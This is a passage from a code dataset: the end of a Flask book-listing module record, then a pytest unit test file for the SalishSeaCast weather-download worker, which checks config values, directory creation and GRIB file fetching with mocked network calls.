\"\\n\"\r\n write_file(\"books.csv\",cvs_str) \r\n return render_template('books/write.html', str=cvs_str)\r\n\r\n\r\n", "sub_path": "flask_web/flask-web2/web/books.py", "file_name": "books.py", "file_ext": "py", "file_size_in_byte": 2567, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 33, "usage_type": "call"}, 
{"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "web.files.save_img", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 60, "usage_type": "call"}, {"api_name": "web.files.write_file", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}]}
+{"seq_id": "314815240", "text": "# Copyright 2013 – present by the SalishSeaCast Project contributors\n# and The University of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# SPDX-License-Identifier: Apache-2.0\n\n\n\"\"\"Unit tests for SalishSeaCast download_weather worker.\n\"\"\"\nimport logging\nimport textwrap\nfrom pathlib import Path\nfrom types import SimpleNamespace\nfrom unittest.mock import patch\n\nimport arrow\nimport nemo_nowcast\nimport pytest\n\nfrom nowcast.workers import download_weather\n\n\n@pytest.fixture()\ndef config(base_config):\n \"\"\":py:class:`nemo_nowcast.Config` instance from YAML fragment to use as config for unit tests.\"\"\"\n config_file = Path(base_config.file)\n with config_file.open(\"at\") as f:\n f.write(\n textwrap.dedent(\n \"\"\"\\\n file group: allen\n\n weather:\n download:\n 2.5 km:\n datamart dir: /SalishSeaCast/datamart/hrdps-continental/\n GRIB dir: /results/forcing/atmospheric/continental2.5/GRIB/\n url template: \"https://hpfx.collab.science.gc.ca/{date}/WXO-DD/model_hrdps/continental/2.5km/{forecast}/{hour}/{filename}\"\n ECCC file template: \"{date}T{forecast}Z_MSC_HRDPS_{variable}_RLatLon0.0225_PT{hour}H.grib2\"\n variables:\n - [UGRD_AGL-10m, u10, u_wind] # u component of wind velocity at 10m elevation\n - [VGRD_AGL-10m, v10, v_wind] # v component of wind velocity at 10m elevation\n - [DSWRF_Sfc, ssrd, solar] # accumulated downward shortwave (solar) radiation at ground level\n - [DLWRF_Sfc, strd, therm_rad] # accumulated downward longwave (thermal) radiation at ground level\n - [LHTFL_Sfc, lhtfl, LHTFL_surface] # upward surface latent heat flux (for VHFR FVCOM)\n - [TMP_AGL-2m, t2m, tair] # air temperature at 2m elevation\n - [SPFH_AGL-2m, sh2, qair] # specific humidity at 2m elevation\n - [RH_AGL-2m, r2, RH_2maboveground] # relative humidity at 2m elevation (for VHFR FVCOM)\n - [APCP_Sfc, unknown, precip] # accumulated precipitation at ground level\n - [PRATE_Sfc, prate, PRATE_surface] # precipitation rate at ground level (for VHFR FVCOM)\n - [PRMSL_MSL, prmsl, atmpres] # atmospheric pressure at mean sea level\n forecast duration: 48 # hours\n\n 1 km:\n GRIB dir: /results/forcing/atmospheric/GEM1.0/GRIB/\n url template: \"https://dd.alpha.meteo.gc.ca/model_hrdps/west/1km/grib2/{forecast}/{hour}/{filename}\"\n ECCC file template: \"CMC_hrdps_west_{variable}_rotated_latlon0.009x0.009_{date}T{forecast}Z_P{hour}-00.grib2\"\n variables:\n - UGRD_TGL_10 # u component of wind velocity at 10m elevation\n - VGRD_TGL_10 # v component of wind velocity at 10m elevation\n - DSWRF_SFC_0 # accumulated downward shortwave (solar) radiation at ground level\n - DLWRF_SFC_0 # accumulated downward longwave (thermal) radiation at ground level\n - LHTFL_SFC_0 # upward surface latent heat flux (for VHFR FVCOM)\n - TMP_TGL_2 # air temperature at 2m elevation\n - SPFH_TGL_2 # specific humidity at 2m elevation\n - RH_TGL_2 # relative humidity at 2m elevation (for VHFR FVCOM)\n - APCP_SFC_0 # accumulated precipitation at ground level\n - 
PRATE_SFC_0 # precipitation rate at ground level (for VHFR FVCOM)\n - PRMSL_MSL_0 # atmospheric pressure at mean sea level\n forecast duration: 36 # hours\n \"\"\"\n )\n )\n config_ = nemo_nowcast.Config()\n config_.load(config_file)\n return config_\n\n\n@pytest.fixture\ndef mock_worker(mock_nowcast_worker, monkeypatch):\n monkeypatch.setattr(download_weather, \"NowcastWorker\", mock_nowcast_worker)\n\n\nclass TestMain:\n \"\"\"Unit tests for main() function.\"\"\"\n\n def test_instantiate_worker(self, mock_worker):\n worker = download_weather.main()\n assert worker.name == \"download_weather\"\n assert worker.description.startswith(\n \"SalishSeaCast worker that downloads the GRIB2 files from the 00, 06, 12, or 18\"\n )\n\n def test_add_forecast_arg(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[3].dest == \"forecast\"\n assert worker.cli.parser._actions[3].choices == {\"00\", \"06\", \"12\", \"18\"}\n assert worker.cli.parser._actions[3].help\n\n def test_add_resolution_arg(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[4].dest == \"resolution\"\n assert worker.cli.parser._actions[4].choices == {\"1km\", \"2.5km\"}\n assert worker.cli.parser._actions[4].default == \"2.5km\"\n assert worker.cli.parser._actions[4].help\n\n def test_add_data_date_option(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[5].dest == \"run_date\"\n expected = nemo_nowcast.cli.CommandLineInterface.arrow_date\n assert worker.cli.parser._actions[5].type == expected\n assert worker.cli.parser._actions[5].default == arrow.now().floor(\"day\")\n assert worker.cli.parser._actions[5].help\n\n def test_add_verify_certs_option(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[6].dest == \"no_verify_certs\"\n assert worker.cli.parser._actions[6].default is False\n assert worker.cli.parser._actions[6].help\n\n\nclass TestConfig:\n \"\"\"Unit tests for production YAML config file elements related to worker.\"\"\"\n\n def test_message_registry(self, prod_config):\n assert \"download_weather\" in prod_config[\"message registry\"][\"workers\"]\n msg_registry = prod_config[\"message registry\"][\"workers\"][\"download_weather\"]\n assert msg_registry[\"checklist key\"] == \"weather forecast\"\n\n def test_message_registry_keys(self, prod_config):\n msg_registry = prod_config[\"message registry\"][\"workers\"][\"download_weather\"]\n assert list(msg_registry.keys()) == [\n \"checklist key\",\n \"success 2.5km 00\",\n \"failure 2.5km 00\",\n \"success 2.5km 06\",\n \"failure 2.5km 06\",\n \"success 2.5km 12\",\n \"failure 2.5km 12\",\n \"success 2.5km 18\",\n \"failure 2.5km 18\",\n \"success 1km 00\",\n \"failure 1km 00\",\n \"success 1km 12\",\n \"failure 1km 12\",\n \"crash\",\n ]\n\n def test_file_group(self, prod_config):\n assert \"file group\" in prod_config\n assert prod_config[\"file group\"] == \"sallen\"\n\n def test_weather_download_2_5_km_section(self, prod_config):\n weather_download = prod_config[\"weather\"][\"download\"][\"2.5 km\"]\n assert (\n weather_download[\"GRIB dir\"]\n == \"/results/forcing/atmospheric/continental2.5/GRIB/\"\n )\n assert (\n weather_download[\"url template\"]\n == \"https://hpfx.collab.science.gc.ca/{date}/WXO-DD/model_hrdps/continental/2.5km/{forecast}/{hour}/{filename}\"\n )\n assert (\n weather_download[\"ECCC file template\"]\n == \"{date}T{forecast}Z_MSC_HRDPS_{variable}_RLatLon0.0225_PT{hour}H.grib2\"\n )\n assert 
weather_download[\"forecast duration\"] == 48\n assert weather_download[\"variables\"] == [\n [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"],\n [\"VGRD_AGL-10m\", \"v10\", \"v_wind\"],\n [\"DSWRF_Sfc\", \"ssrd\", \"solar\"],\n [\"DLWRF_Sfc\", \"strd\", \"therm_rad\"],\n [\"LHTFL_Sfc\", \"lhtfl\", \"LHTFL_surface\"],\n [\"TMP_AGL-2m\", \"t2m\", \"tair\"],\n [\"SPFH_AGL-2m\", \"sh2\", \"qair\"],\n [\"RH_AGL-2m\", \"r2\", \"RH_2maboveground\"],\n [\"APCP_Sfc\", \"unknown\", \"precip\"],\n [\"PRATE_Sfc\", \"prate\", \"PRATE_surface\"],\n [\"PRMSL_MSL\", \"prmsl\", \"atmpres\"],\n ]\n\n def test_weather_download_1_km_section(self, prod_config):\n weather_download = prod_config[\"weather\"][\"download\"][\"1 km\"]\n assert (\n weather_download[\"GRIB dir\"] == \"/results/forcing/atmospheric/GEM1.0/GRIB/\"\n )\n assert (\n weather_download[\"url template\"]\n == \"https://dd.alpha.meteo.gc.ca/model_hrdps/west/1km/grib2/{forecast}/{hour}/{filename}\"\n )\n assert (\n weather_download[\"ECCC file template\"]\n == \"CMC_hrdps_west_{variable}_rotated_latlon0.009x0.009_{date}T{forecast}Z_P{hour}-00.grib2\"\n )\n assert weather_download[\"forecast duration\"] == 36\n assert weather_download[\"variables\"] == [\n \"UGRD_TGL_10\",\n \"VGRD_TGL_10\",\n \"DSWRF_SFC_0\",\n \"DLWRF_SFC_0\",\n \"LHTFL_SFC_0\",\n \"TMP_TGL_2\",\n \"SPFH_TGL_2\",\n \"RH_TGL_2\",\n \"APCP_SFC_0\",\n \"PRATE_SFC_0\",\n \"PRMSL_MSL_0\",\n ]\n\n\n@pytest.mark.parametrize(\n \"forecast, resolution, forecast_date\",\n (\n (\"00\", \"2.5km\", \"2020-02-10\"),\n (\"06\", \"2.5km\", \"2020-02-10\"),\n (\"12\", \"2.5km\", \"2020-02-10\"),\n (\"18\", \"2.5km\", \"2020-02-10\"),\n (\"00\", \"1km\", \"2020-02-10\"),\n (\"12\", \"1km\", \"2020-02-10\"),\n ),\n)\nclass TestSuccess:\n \"\"\"Unit tests for success() function.\"\"\"\n\n def test_success(self, forecast, resolution, forecast_date, caplog):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=forecast_date,\n no_verify_certs=False,\n )\n caplog.set_level(logging.DEBUG)\n\n msg_type = download_weather.success(parsed_args)\n\n assert caplog.records[0].levelname == \"INFO\"\n expected = f\"{forecast_date} {resolution} weather forecast {forecast} downloads complete\"\n assert caplog.messages[0] == expected\n assert msg_type == f\"success {resolution} {forecast}\"\n\n\n@pytest.mark.parametrize(\n \"forecast, resolution, forecast_date\",\n (\n (\"00\", \"1km\", \"2020-02-10\"),\n (\"12\", \"1km\", \"2020-02-10\"),\n (\"00\", \"2.5km\", \"2020-02-10\"),\n (\"06\", \"2.5km\", \"2020-02-10\"),\n (\"12\", \"2.5km\", \"2020-02-10\"),\n (\"18\", \"2.5km\", \"2020-02-10\"),\n ),\n)\nclass TestFailure:\n \"\"\"Unit tests for failure() function.\"\"\"\n\n def test_failure(self, forecast, resolution, forecast_date, caplog):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=forecast_date,\n no_verify_certs=False,\n )\n caplog.set_level(logging.DEBUG)\n\n msg_type = download_weather.failure(parsed_args)\n\n assert caplog.records[0].levelname == \"CRITICAL\"\n expected = f\"{forecast_date} {resolution} weather forecast {parsed_args.forecast} downloads failed\"\n assert caplog.messages[0] == expected\n assert msg_type == f\"failure {resolution} {forecast}\"\n\n\n@patch(\"nowcast.workers.download_weather.lib.mkdir\", autospec=True)\n@patch(\"nowcast.workers.download_weather.lib.fix_perms\", autospec=True)\n@patch(\"nowcast.workers.download_weather._get_file\", autospec=True)\nclass TestGetGrib:\n \"\"\"Unit tests for get_grib() 
function.\"\"\"\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"2.5km\"),\n (\"06\", \"2.5km\"),\n (\"12\", \"2.5km\"),\n (\"18\", \"2.5km\"),\n ),\n )\n def test_make_hour_dirs_2_5km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"forecast duration\": 6},\n )\n\n with p_config:\n download_weather.get_grib(parsed_args, config)\n\n for hr in range(1, 7):\n args, kwargs = m_mkdir.call_args_list[hr + 1]\n expected = f\"/results/forcing/atmospheric/continental{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}/00{hr}\"\n assert args[0] == expected\n assert kwargs == {\"grp_name\": \"allen\", \"exist_ok\": False}\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"1km\"),\n (\"12\", \"1km\"),\n ),\n )\n def test_make_hour_dirs_1km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"forecast duration\": 6},\n )\n\n with p_config:\n download_weather.get_grib(parsed_args, config)\n\n for hr in range(1, 7):\n args, kwargs = m_mkdir.call_args_list[hr + 1]\n expected = f\"/results/forcing/atmospheric/GEM{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}/00{hr}\"\n assert args[0] == expected\n assert kwargs == {\"grp_name\": \"allen\", \"exist_ok\": False}\n\n @pytest.mark.parametrize(\n \"forecast, resolution, variables\",\n (\n (\"00\", \"1km\", \"UGRD_TGL_10\"),\n (\"12\", \"1km\", \"UGRD_TGL_10\"),\n (\"00\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n (\"06\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n (\"12\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n (\"18\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n ),\n )\n @patch(\"nowcast.workers.download_weather.requests.Session\", autospec=True)\n def test_get_grib_variable_file(\n self,\n m_session,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n variables,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"variables\": [variables], \"forecast duration\": 1},\n )\n\n with p_config:\n download_weather.get_grib(parsed_args, config)\n\n args, kwargs = m_get_file.call_args\n variable = variables[0] if resolution == \"2.5km\" else variables\n assert args == (\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")][\n \"url template\"\n ],\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")][\n \"ECCC file template\"\n ],\n variable,\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")][\"GRIB dir\"],\n \"20230224\",\n forecast,\n \"001\",\n m_session().__enter__(),\n )\n assert kwargs == {}\n\n @pytest.mark.parametrize(\n \"forecast, resolution, variable\",\n (\n (\"00\", \"1km\", \"UGRD_TGL_10\"),\n (\"12\", \"1km\", \"UGRD_TGL_10\"),\n (\"00\", \"2.5km\", \"UGRD_AGL-10m\"),\n (\"06\", \"2.5km\", 
\"UGRD_AGL-10m\"),\n (\"12\", \"2.5km\", \"UGRD_AGL-10m\"),\n (\"18\", \"2.5km\", \"UGRD_AGL-10m\"),\n ),\n )\n def test_fix_perms(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n variable,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"variables\": [variable], \"forecast duration\": 1},\n )\n m_get_file.return_value = \"filepath\"\n p_fix_perms = patch(\"nowcast.workers.download_weather.lib.fix_perms\")\n\n with p_config, p_fix_perms as m_fix_perms:\n download_weather.get_grib(parsed_args, config)\n\n m_fix_perms.assert_called_once_with(\"filepath\")\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"2.5km\"),\n (\"06\", \"2.5km\"),\n (\"12\", \"2.5km\"),\n (\"18\", \"2.5km\"),\n ),\n )\n def test_checklist_2_5km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n\n checklist = download_weather.get_grib(parsed_args, config)\n\n expected = {\n f\"{forecast} {resolution}\": f\"/results/forcing/atmospheric/continental{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}\"\n }\n assert checklist == expected\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"1km\"),\n (\"12\", \"1km\"),\n ),\n )\n def test_checklist_1km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n\n checklist = download_weather.get_grib(parsed_args, config)\n\n expected = {\n f\"{forecast} {resolution}\": f\"/results/forcing/atmospheric/GEM{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}\"\n }\n assert checklist == expected\n\n\n@patch(\"nowcast.workers.download_weather.lib.mkdir\", autospec=True)\nclass TestMkdirs:\n \"\"\"Unit tests for _mkdirs() function.\"\"\"\n\n def test_make_date_dir(self, m_mkdir):\n download_weather._mkdirs(\"/tmp\", \"20150618\", \"06\", \"foo\")\n args, kwargs = m_mkdir.call_args_list[0]\n assert args[0] == \"/tmp/20150618\"\n assert kwargs == {\"grp_name\": \"foo\"}\n\n def test_make_forecast_dir(self, m_mkdir):\n download_weather._mkdirs(\"/tmp\", \"20150618\", \"06\", \"foo\")\n args, kwargs = m_mkdir.call_args_list[1]\n assert args[0] == \"/tmp/20150618/06\"\n assert kwargs == {\"grp_name\": \"foo\", \"exist_ok\": False}\n\n\n@patch(\"nowcast.workers.download_weather.get_web_data\", autospec=True)\nclass TestGetFile:\n \"\"\"Unit tests for _get_file() function.\"\"\"\n\n @pytest.mark.parametrize(\n \"resolution, variable\",\n (\n (\"1 km\", \"UGRD_TGL_10\"),\n (\"2.5 km\", \"UGRD_AGL-10m\"),\n ),\n )\n def test_get_web_data(\n self,\n m_get_web_data,\n resolution,\n variable,\n config,\n caplog,\n monkeypatch,\n ):\n def mock_stat(filepath):\n return SimpleNamespace(st_size=123_456)\n\n monkeypatch.setattr(download_weather.os, \"stat\", mock_stat)\n\n caplog.set_level(logging.DEBUG)\n\n download_weather._get_file(\n config[\"weather\"][\"download\"][resolution][\"url template\"],\n config[\"weather\"][\"download\"][resolution][\"ECCC file template\"],\n variable,\n config[\"weather\"][\"download\"][resolution][\"GRIB dir\"],\n 
\"20150619\",\n \"06\",\n \"001\",\n None,\n )\n\n filename = config[\"weather\"][\"download\"][resolution][\n \"ECCC file template\"\n ].format(variable=variable, date=\"20150619\", forecast=\"06\", hour=\"001\")\n url = config[\"weather\"][\"download\"][resolution][\"url template\"].format(\n date=\"20150619\", forecast=\"06\", hour=\"001\", filename=filename\n )\n filepath = Path(\n config[\"weather\"][\"download\"][resolution][\"GRIB dir\"],\n \"20150619\",\n \"06\",\n \"001\",\n filename,\n )\n\n m_get_web_data.assert_called_once_with(\n url,\n \"download_weather\",\n Path(filepath),\n session=None,\n wait_exponential_max=9000,\n )\n\n assert caplog.records[0].levelname == \"DEBUG\"\n assert caplog.messages[0] == f\"downloaded 123456 bytes from {url}\"\n\n @pytest.mark.parametrize(\"resolution\", (\"1 km\", \"2.5 km\"))\n def test_empty_file_exception(\n self,\n m_get_web_data,\n resolution,\n config,\n caplog,\n monkeypatch,\n ):\n def mock_stat(filepath):\n return SimpleNamespace(st_size=0)\n\n monkeypatch.setattr(download_weather.os, \"stat\", mock_stat)\n\n caplog.set_level(logging.DEBUG)\n\n with pytest.raises(download_weather.WorkerError):\n download_weather._get_file(\n config[\"weather\"][\"download\"][resolution][\"url template\"],\n config[\"weather\"][\"download\"][resolution][\"ECCC file template\"],\n \"UGRD_TGL_10\",\n config[\"weather\"][\"download\"][resolution][\"GRIB dir\"],\n \"20150619\",\n \"06\",\n \"001\",\n None,\n )\n\n assert caplog.records[0].levelname == \"DEBUG\"\n assert caplog.messages[0].startswith(\"downloaded 0 bytes from\")\n assert caplog.records[1].levelname == \"CRITICAL\"\n assert caplog.messages[1].startswith(\"Problem! 0 size file:\")\n", "sub_path": "tests/workers/test_download_weather.py", "file_name": "test_download_weather.py", "file_ext": "py", "file_size_in_byte": 22760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 40, "usage_type": "call"}, {"api_name": "nemo_nowcast.Config", "line_number": 85, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 92, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 90, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 99, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 99, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 106, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 106, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 112, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 112, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 119, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 119, "usage_type": "name"}, {"api_name": "nemo_nowcast.cli", "line_number": 121, "usage_type": "attribute"}, {"api_name": "arrow.now", "line_number": 123, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 127, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 127, "usage_type": "name"}, {"api_name": 
"types.SimpleNamespace", "line_number": 237, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 243, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather.success", "line_number": 245, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 245, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 222, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 222, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 268, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 274, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather.failure", "line_number": 276, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 276, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 253, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 253, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 308, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 311, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 314, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 314, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 320, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 320, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 290, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 290, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 344, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 347, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 350, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 350, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 356, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 356, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 328, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 328, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 387, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 390, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 393, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 393, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 399, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 399, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 364, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 364, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 375, "usage_type": "call"}, {"api_name": "types.SimpleNamespace", "line_number": 440, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 443, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 446, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 446, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 451, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 454, 
"usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 454, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 419, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 419, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 476, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 479, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 483, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 483, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 458, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 458, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 506, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 509, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 513, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 513, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 490, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 490, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 284, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 285, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 286, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather._mkdirs", "line_number": 526, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 526, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather._mkdirs", "line_number": 532, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 532, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 521, "usage_type": "call"}, {"api_name": "types.SimpleNamespace", "line_number": 559, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.os", "line_number": 561, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather", "line_number": 561, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 563, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather._get_file", "line_number": 565, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 565, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 582, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 593, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 542, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 542, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 611, "usage_type": 